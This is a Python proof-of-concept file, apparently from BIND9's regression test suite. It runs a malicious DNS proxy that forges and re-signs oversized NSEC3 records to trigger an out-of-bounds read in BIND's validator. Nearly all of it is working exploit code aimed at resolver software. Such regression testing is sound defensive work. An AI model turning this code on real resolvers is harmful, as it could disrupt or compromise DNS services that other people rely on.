Home | History | Annotate | Line # | Download | only in ans7
      1 #!/usr/bin/env python3
      2 # Copyright (C) Internet Systems Consortium, Inc. ("ISC")
      3 #
      4 # SPDX-License-Identifier: MPL-2.0
      5 #
      6 # This Source Code Form is subject to the terms of the Mozilla Public
      7 # License, v. 2.0.  If a copy of the MPL was not distributed with this
      8 # file, you can obtain one at https://mozilla.org/MPL/2.0/.
      9 #
     10 # See the COPYRIGHT file distributed with this work for additional
     11 # information regarding copyright ownership.
     12 
     13 """
     14 Crafted authoritative DNS proxy for BIND9 NSEC3 OOB read PoC.
     15 
     16 Simulates a malicious authoritative server that crafts NSEC3 responses
     17 to trigger CWE-125 (out-of-bounds stack read) in validator.c:344.
     18 
     19 Attack chain:
     20 1. Resolver queries xxx.evil.test A -> proxy modifies NSEC3 in A response
     21    (breaks the NSEC3 proof, forcing proveunsecure() fallback)
     22 2. Resolver fetches DS for xxx.evil.test -> proxy injects crafted NSEC3
     23    with next_length=200 (exceeds 155-byte buffer) at position 0
     24 3. DS validation succeeds via unmodified NSEC3 (opt-out coverage)
     25 4. ncache stores: [crafted_nsec3 (200B next), original_nsec3]
     26 5. isdelegation() iterates ncache -> crafted first -> memcmp() OOB read
     27 
     28 Usage: python3 crafted_auth_v6.py <ip> <port>
     29        Listens on [ip]:[port]
     30        Forwards to legitimate auth server on [10.53.0.6]:[port]
     31 
     32 Prerequisites: pip install dnspython cryptography
     33 """
     34 
     35 import base64
     36 import glob
     37 import os
     38 import signal
     39 import socket
     40 import struct
     41 import sys
     42 import time
     43 
     44 from cryptography.hazmat.backends import default_backend
     45 from cryptography.hazmat.primitives import hashes
     46 from cryptography.hazmat.primitives.asymmetric import ec, utils
     47 
     48 import dns.message
     49 import dns.name
     50 import dns.rcode
     51 import dns.rdata
     52 import dns.rdataclass
     53 import dns.rdatatype
     54 import dns.rrset
     55 
# Listening address, taken from the command line: <ip> <port>.
IP = sys.argv[1]
PORT = int(sys.argv[2])

# Size, in bytes, of the forged NSEC3 "next hashed owner" field.
TARGET_NEXT_LENGTH = 200
# Signed zone the NSEC3 owner names and next hashes are read from.
ZONE_FILE = "../ns6/evil.test.db.signed"

# NSEC3 params: alg=1(SHA1), flags=1(opt-out), iterations=10, salt=DEADBEEF
NSEC3_ALG, NSEC3_FLAGS, NSEC3_ITERATIONS = 1, 1, 10
NSEC3_SALT = bytes((0xDE, 0xAD, 0xBE, 0xEF))
NSEC3_TTL = 86400

# RRSIG timing: computed dynamically for portability
NOW = int(time.time())
RRSIG_INCEPTION = NOW - 60 * 60  # 1 hour ago
RRSIG_EXPIRATION = NOW + 30 * 24 * 60 * 60  # 30 days from now
RRSIG_LABELS = 3
RRSIG_ORIG_TTL = 86400
     74 
     75 
def discover_nsec3_from_zone(zone_file):
    """
    Auto-discover NSEC3 owner names and next hashes from the signed zone.

    The file is read line by line and each line is split on whitespace.  A
    line counts as an NSEC3 record when its fourth field is ``NSEC3``, i.e.
    the single-line layout
    ``owner TTL class NSEC3 alg flags iterations salt next-hash ...``.
    Blank lines, ``;`` comment lines and lines with fewer than four fields
    (directives, continuation lines) are skipped, as are NSEC3 lines whose
    rdata is truncated or whose flags field is not an integer.

    Returns a list of dicts with the keys "owner", "next_hash_b32" and
    "flags", sorted by owner name.
    """
    nsec3_records = []
    with open(zone_file, "r", encoding="utf-8") as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith(";"):
                continue
            parts = line.split()
            # Lines with fewer than four fields cannot carry a record type
            # in the fourth column; indexing them used to raise IndexError.
            if len(parts) < 4 or parts[3] != "NSEC3":
                continue
            print(parts)
            try:
                idx = parts.index("NSEC3")
                print(idx)
                # Rdata fields after the type: alg, flags, iterations,
                # salt, next hash.
                next_hash_b32 = parts[idx + 5]
                flags = int(parts[idx + 2])
            except (IndexError, ValueError):
                continue
            nsec3_records.append(
                {
                    "owner": parts[0],
                    "next_hash_b32": next_hash_b32,
                    "flags": flags,
                }
            )
    nsec3_records.sort(key=lambda r: r["owner"])
    return nsec3_records
    107 
    108 
    109 def b32_to_bytes(b32hex_str):
    110     """Decode base32hex (RFC 4648) to bytes."""
    111     padded = b32hex_str.upper() + "=" * ((8 - len(b32hex_str) % 8) % 8)
    112     return base64.b32hexdecode(padded)
    113 
    114 
def load_zsk():
    """
    Load the Zone Signing Key (ZSK) for re-signing modified records.

    Scans ../ns6 for algorithm-13 key pairs of evil.test, picks the first
    whose public key file contains "256 3 13", and reads the "PrivateKey:"
    line of the matching .private file.

    Returns (private_key, key_tag); raises ValueError when no usable key
    is found.
    """
    for private_path in glob.glob("../ns6/Kevil.test.+013+*.private"):
        public_path = private_path.replace(".private", ".key")
        with open(public_path, "r", encoding="utf-8") as pub_file:
            is_zsk = "256 3 13" in pub_file.read()
        if not is_zsk:
            continue

        with open(private_path, "r", encoding="utf-8") as priv_file:
            for entry in priv_file:
                if not entry.startswith("PrivateKey:"):
                    continue
                secret = base64.b64decode(entry.split(":", 1)[1].strip())
                scalar = int.from_bytes(secret, "big")
                private_key = ec.derive_private_key(
                    scalar, ec.SECP256R1(), default_backend()
                )
                # The key tag is the trailing "+NNNNN" part of the file name.
                suffix = private_path.split("+")[-1]
                key_tag = int(suffix.replace(".private", ""))
                print(f"[*] Loaded ZSK key tag={key_tag}", flush=True)
                return private_key, key_tag

    raise ValueError("No ZSK found")
    136 
    137 
def sign_rrset(
    private_key,
    key_tag,
    rrset,
    type_covered,
    labels,
    original_ttl,
    expiration,
    inception,
    signer_name,
):
    """
    Sign an RRset with ECDSAP256SHA256 and return RRSIG rdata.

    The signed data is the RRSIG rdata without its signature field,
    followed by every record of the RRset in canonical form (canonical
    owner name, type, class, original TTL, RDLENGTH, RDATA).  Records are
    ordered by their canonical RDATA alone, as RFC 4034 section 6.3
    requires; the RDLENGTH prefix takes no part in the ordering.

    Arguments:
        private_key:  EC private key used to produce the signature.
        key_tag:      key tag placed in the RRSIG.
        rrset:        the RRset to sign (name, rdtype, rdclass, rdatas).
        type_covered: value of the RRSIG "type covered" field.
        labels:       value of the RRSIG "labels" field.
        original_ttl: value of the "original TTL" field; also the TTL
                      used for every record in the signed data.
        expiration:   signature expiration, seconds since the epoch.
        inception:    signature inception, seconds since the epoch.
        signer_name:  dns.name.Name of the signing zone.

    Returns the RRSIG as an rdata object parsed by dns.rdata.from_wire().
    """
    algorithm = 13

    # RRSIG rdata up to, but excluding, the signature itself.
    sig_rdata = struct.pack(
        "!HBBIIIH",
        type_covered,
        algorithm,
        labels,
        original_ttl,
        expiration,
        inception,
        key_tag,
    )
    sig_rdata += signer_name.canonicalize().to_wire()

    # Owner/type/class/TTL are identical for every record; build them once.
    rr_prefix = rrset.name.canonicalize().to_wire()
    rr_prefix += struct.pack("!HHI", rrset.rdtype, rrset.rdclass, original_ttl)

    # Canonical RR ordering compares the RDATA octets only.
    rdata_wires = sorted(rdata.to_digestable() for rdata in rrset)
    sign_data = sig_rdata + b"".join(
        rr_prefix + struct.pack("!H", len(rdata_wire)) + rdata_wire
        for rdata_wire in rdata_wires
    )

    # cryptography yields a DER signature; DNSSEC wants fixed-width r || s.
    der_sig = private_key.sign(sign_data, ec.ECDSA(hashes.SHA256()))
    r, s = utils.decode_dss_signature(der_sig)
    raw_sig = r.to_bytes(32, "big") + s.to_bytes(32, "big")

    full_rrsig_wire = sig_rdata + raw_sig
    rrsig_rdata = dns.rdata.from_wire(
        dns.rdataclass.IN,
        dns.rdatatype.RRSIG,
        full_rrsig_wire,
        0,
        len(full_rrsig_wire),
        None,
    )
    return rrsig_rdata
    183 
    184 
def sign_rrset_from_template(private_key, key_tag, rrset, template_rrsig):
    """
    Sign rrset, copying type_covered and signer from template_rrsig.

    Labels, original TTL and the validity window come from the
    module-level RRSIG_* constants, not from the template.
    """
    return sign_rrset(
        private_key,
        key_tag,
        rrset,
        type_covered=template_rrsig.type_covered,
        labels=RRSIG_LABELS,
        original_ttl=RRSIG_ORIG_TTL,
        expiration=RRSIG_EXPIRATION,
        inception=RRSIG_INCEPTION,
        signer_name=template_rrsig.signer,
    )
    198 
    199 
def build_crafted_nsec3(private_key, key_tag, owner_name, original_next_hash, bitmaps):
    """
    Build a signed NSEC3 whose next-hash field is TARGET_NEXT_LENGTH bytes.

    The real next hash is kept as a prefix and padded with random bytes;
    the record uses the module-level NSEC3_* parameters and the supplied
    type bitmaps, and is signed with "evil.test." as the signer name.

    Returns (nsec3_rrset, rrsig_rrset).
    """
    owner = dns.name.from_text(owner_name)
    zone_apex = dns.name.from_text("evil.test.")

    padding = os.urandom(TARGET_NEXT_LENGTH - len(original_next_hash))
    oversized_next = original_next_hash + padding

    # NSEC3 rdata: alg, flags, iterations, salt, next hash, type bitmaps.
    wire = b"".join(
        (
            struct.pack("!BBH", NSEC3_ALG, NSEC3_FLAGS, NSEC3_ITERATIONS),
            struct.pack("!B", len(NSEC3_SALT)),
            NSEC3_SALT,
            struct.pack("!B", TARGET_NEXT_LENGTH),
            oversized_next,
            bitmaps,
        )
    )
    crafted_rdata = dns.rdata.from_wire(
        dns.rdataclass.IN, dns.rdatatype.NSEC3, wire, 0, len(wire), None
    )

    nsec3_rrset = dns.rrset.RRset(owner, dns.rdataclass.IN, dns.rdatatype.NSEC3)
    nsec3_rrset.update_ttl(NSEC3_TTL)
    nsec3_rrset.add(crafted_rdata)

    signature = sign_rrset(
        private_key,
        key_tag,
        nsec3_rrset,
        type_covered=dns.rdatatype.NSEC3,
        labels=RRSIG_LABELS,
        original_ttl=RRSIG_ORIG_TTL,
        expiration=RRSIG_EXPIRATION,
        inception=RRSIG_INCEPTION,
        signer_name=zone_apex,
    )

    rrsig_rrset = dns.rrset.RRset(owner, dns.rdataclass.IN, dns.rdatatype.RRSIG)
    rrsig_rrset.update_ttl(NSEC3_TTL)
    rrsig_rrset.add(signature)

    print(
        f"[*] Built crafted NSEC3: owner={owner_name}, "
        f"next_hash={TARGET_NEXT_LENGTH}B, signed tag={key_tag}",
        flush=True,
    )
    return nsec3_rrset, rrsig_rrset
    247 
    248 
def modify_nsec3_next(rdata):
    """
    Return a copy of an NSEC3 rdata with an oversized next-hash field.

    Algorithm, flags, iterations, salt and type bitmaps are carried over
    unchanged; the next hash keeps its original bytes as a prefix and is
    padded with random bytes up to TARGET_NEXT_LENGTH.
    """
    wire = rdata.to_digestable()

    # Fixed header: hash alg (1), flags (1), iterations (2), salt length (1).
    hash_alg, flags, iterations, salt_len = struct.unpack_from("!BBHB", wire, 0)
    salt_end = 5 + salt_len
    salt = wire[5:salt_end]

    hash_len = wire[salt_end]
    hash_start = salt_end + 1
    hash_end = hash_start + hash_len
    next_hash = wire[hash_start:hash_end]
    type_bitmaps = wire[hash_end:]

    padded_next = next_hash + os.urandom(TARGET_NEXT_LENGTH - len(next_hash))
    rebuilt = b"".join(
        (
            struct.pack("!BBH", hash_alg, flags, iterations),
            struct.pack("!B", salt_len),
            salt,
            struct.pack("!B", TARGET_NEXT_LENGTH),
            padded_next,
            type_bitmaps,
        )
    )

    return dns.rdata.from_wire(
        dns.rdataclass.IN, dns.rdatatype.NSEC3, rebuilt, 0, len(rebuilt), None
    )
    278 
    279 
def name_label(name):
    """Return the upper-cased first label of a DNS name (the NSEC3 hash)."""
    first_label, _, _ = str(name).partition(".")
    return first_label.upper()
    283 
    284 
def is_target(dns_name, target_prefix):
    """Tell whether the first label of dns_name begins with target_prefix.

    The comparison is case-insensitive.
    """
    first_label = str(dns_name).partition(".")[0].upper()
    wanted = target_prefix.upper()
    return first_label.startswith(wanted)
    293 
    294 
def patch_a_response(response_data, private_key, key_tag, modify_name):
    """
    Rewrite the authority section of an A/AAAA response.

    Every NSEC3 RRset whose owner's first label starts with modify_name
    gets its next hash stretched to TARGET_NEXT_LENGTH bytes, and the
    RRSIG covering it is replaced by a fresh signature over the modified
    RRset.  This breaks the NSEC3 proof, forcing the resolver into
    proveunsecure().  All other RRsets pass through untouched.

    Returns the patched wire message, or response_data unchanged when the
    message cannot be parsed or re-encoded.
    """
    try:
        msg = dns.message.from_wire(response_data)
    except Exception as e:  # pylint: disable=broad-except
        print(f"[!] Parse error: {e}", flush=True)
        return response_data

    rebuilt = []
    for rrset in msg.authority:
        hits_target = is_target(rrset.name, modify_name)

        if rrset.rdtype == dns.rdatatype.NSEC3 and hits_target:
            patched = dns.rrset.RRset(rrset.name, rrset.rdclass, rrset.rdtype)
            patched.update_ttl(rrset.ttl)
            for rdata in rrset:
                patched.add(modify_nsec3_next(rdata))
            rebuilt.append(patched)
            print(
                f"[!] PATCHED {name_label(rrset.name)}: "
                f"next_hash -> {TARGET_NEXT_LENGTH}B",
                flush=True,
            )
            continue

        # Anything that is not the RRSIG over a target NSEC3 is kept as is.
        replacement = rrset
        if (
            rrset.rdtype == dns.rdatatype.RRSIG
            and hits_target
            and any(rd.type_covered == dns.rdatatype.NSEC3 for rd in rrset)
        ):
            # Only re-sign when the modified NSEC3 has already been emitted.
            modified_nsec3 = next(
                (
                    rs
                    for rs in rebuilt
                    if rs.rdtype == dns.rdatatype.NSEC3
                    and is_target(rs.name, modify_name)
                ),
                None,
            )
            if modified_nsec3 is not None:
                template = next(iter(rrset))
                try:
                    new_rrsig = sign_rrset_from_template(
                        private_key, key_tag, modified_nsec3, template
                    )
                    resigned = dns.rrset.RRset(
                        rrset.name, dns.rdataclass.IN, dns.rdatatype.RRSIG
                    )
                    resigned.update_ttl(rrset.ttl)
                    resigned.add(new_rrsig)
                    replacement = resigned
                    print(f"[!] Re-signed " f"{name_label(rrset.name)}", flush=True)
                except Exception as e:  # pylint: disable=broad-except
                    print(f"[!] Sign error: {e}", flush=True)
                    replacement = rrset
        rebuilt.append(replacement)

    msg.authority = rebuilt
    try:
        wire = msg.to_wire()
    except Exception as e:  # pylint: disable=broad-except
        print(f"[!] Wire error: {e}", flush=True)
        return response_data
    print(f"[!] A response: {len(wire)} bytes", flush=True)
    return wire
    360 
    361 
def patch_ds_response(response_data, crafted_nsec3, crafted_rrsig, inject_name):
    """
    Rewrite a DS response so the crafted NSEC3 leads the authority section.

    - An NXDOMAIN rcode is turned into NOERROR.
    - crafted_nsec3 and crafted_rrsig are placed first in the authority
      section.
    - Original RRsets whose owner's first label starts with inject_name
      are dropped; everything else follows in its original order.

    Returns the patched wire message, or response_data unchanged when the
    message cannot be parsed or re-encoded.
    """
    try:
        msg = dns.message.from_wire(response_data)
    except Exception as e:  # pylint: disable=broad-except
        print(f"[!] Parse error: {e}", flush=True)
        return response_data

    if msg.rcode() == dns.rcode.NXDOMAIN:
        msg.set_rcode(dns.rcode.NOERROR)
        print("[!] RCODE: NXDOMAIN -> NOERROR", flush=True)

    print(
        "[!] INJECTED crafted "
        f"{name_label(crafted_nsec3.name)} "
        f"(next={TARGET_NEXT_LENGTH}B) at position 0",
        flush=True,
    )
    authority = [crafted_nsec3, crafted_rrsig]

    for rrset in msg.authority:
        if not is_target(rrset.name, inject_name):
            authority.append(rrset)
            continue
        # Superseded by the crafted record inserted above.
        print(f"[D] Skipped original " f"{name_label(rrset.name)}", flush=True)

    msg.authority = authority
    try:
        wire = msg.to_wire()
    except Exception as e:  # pylint: disable=broad-except
        print(f"[!] Wire error: {e}", flush=True)
        return response_data
    print(f"[!] DS response: {len(wire)} bytes", flush=True)
    return wire
    400 
    401 
def sigterm(*_):
    """
    Signal handler: remove the pid file and exit with status 0.

    The handler can run before "ans.pid" has been written (or after it
    has already been removed), so a missing pid file is not an error.
    """
    print("SIGTERM received, shutting down")
    try:
        os.remove("ans.pid")
    except FileNotFoundError:
        pass
    sys.exit(0)
    406 
    407 
def main():
    """
    Run the crafted authoritative proxy.

    Writes "ans.pid", picks the two first NSEC3 records (by owner name)
    from the signed zone, pre-builds the crafted NSEC3 and then relays UDP
    queries received on IP:PORT to the legitimate server, patching DS and
    A/AAAA responses on the way back.  Runs until terminated by a signal.
    """
    # Legitimate authoritative server every query is relayed to.
    upstream = ("10.53.0.6", PORT)

    signal.signal(signal.SIGTERM, sigterm)
    signal.signal(signal.SIGINT, sigterm)
    with open("ans.pid", "w", encoding="utf-8") as pidfile:
        print(os.getpid(), file=pidfile)

    # Auto-discover NSEC3 info from signed zone
    print(f"[*] Reading zone file: {ZONE_FILE}", flush=True)
    nsec3_records = discover_nsec3_from_zone(ZONE_FILE)

    if len(nsec3_records) < 2:
        print(
            f"[!] ERROR: Need >= 2 NSEC3 records, " f"found {len(nsec3_records)}",
            flush=True,
        )
        sys.exit(1)

    # First alphabetically = inject target, second = modify target
    inject_rec = nsec3_records[0]
    modify_rec = nsec3_records[1]

    inject_name = inject_rec["owner"].split(".")[0]
    modify_name = modify_rec["owner"].split(".")[0]
    inject_owner_full = inject_rec["owner"]
    inject_next_hash = b32_to_bytes(inject_rec["next_hash_b32"])

    inject_bitmaps = bytes.fromhex("0006400000000002")  # A RRSIG

    print(f"[*] NSEC3 to INJECT (crafted): {inject_name}", flush=True)
    print(f"[*] NSEC3 to MODIFY (break proof): {modify_name}", flush=True)

    # Load ZSK for re-signing
    private_key, key_tag = load_zsk()

    # Build crafted NSEC3 with next_length=200
    crafted_nsec3, crafted_rrsig = build_crafted_nsec3(
        private_key, key_tag, inject_owner_full, inject_next_hash, inject_bitmaps
    )

    # Start UDP proxy
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((IP, PORT))
    print(f"[*] Proxy on {IP}:{PORT} -> {upstream[0]}:{upstream[1]}", flush=True)

    while True:
        data, addr = sock.recvfrom(4096)
        try:
            query = dns.message.from_wire(data)
            qname = query.question[0].name
            qtype = query.question[0].rdtype
            qtype_text = dns.rdatatype.to_text(qtype)
            print(f"\n[<] Query from {addr}: {qname} {qtype_text}", flush=True)
        except Exception as e:  # pylint: disable=broad-except
            print(f"[<] Query parse error: {e}", flush=True)
            # Unparsable queries are still relayed verbatim; give the log
            # line below a defined value instead of a stale or unbound one.
            qtype = None
            qtype_text = "UNKNOWN"

        # One short-lived socket per query; the context manager closes it
        # even when sending or receiving fails.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as fwd:
            try:
                fwd.settimeout(3)
                fwd.sendto(data, upstream)
                response, _ = fwd.recvfrom(65535)
                if qtype == dns.rdatatype.DS:
                    print("[>] DS - inject crafted + RCODE change", flush=True)
                    modified = patch_ds_response(
                        response, crafted_nsec3, crafted_rrsig, inject_name
                    )
                    sock.sendto(modified, addr)
                elif qtype in (dns.rdatatype.A, dns.rdatatype.AAAA):
                    print(f"[>] A - modify {modify_name}", flush=True)
                    modified = patch_a_response(
                        response, private_key, key_tag, modify_name
                    )
                    sock.sendto(modified, addr)
                else:
                    print(f"[>] {qtype_text} - forwarding", flush=True)
                    sock.sendto(response, addr)
            except Exception as e:  # pylint: disable=broad-except
                # A lost or failed exchange must not take the proxy down.
                print(f"[!] Error: {e}", flush=True)


if __name__ == "__main__":
    main()
    491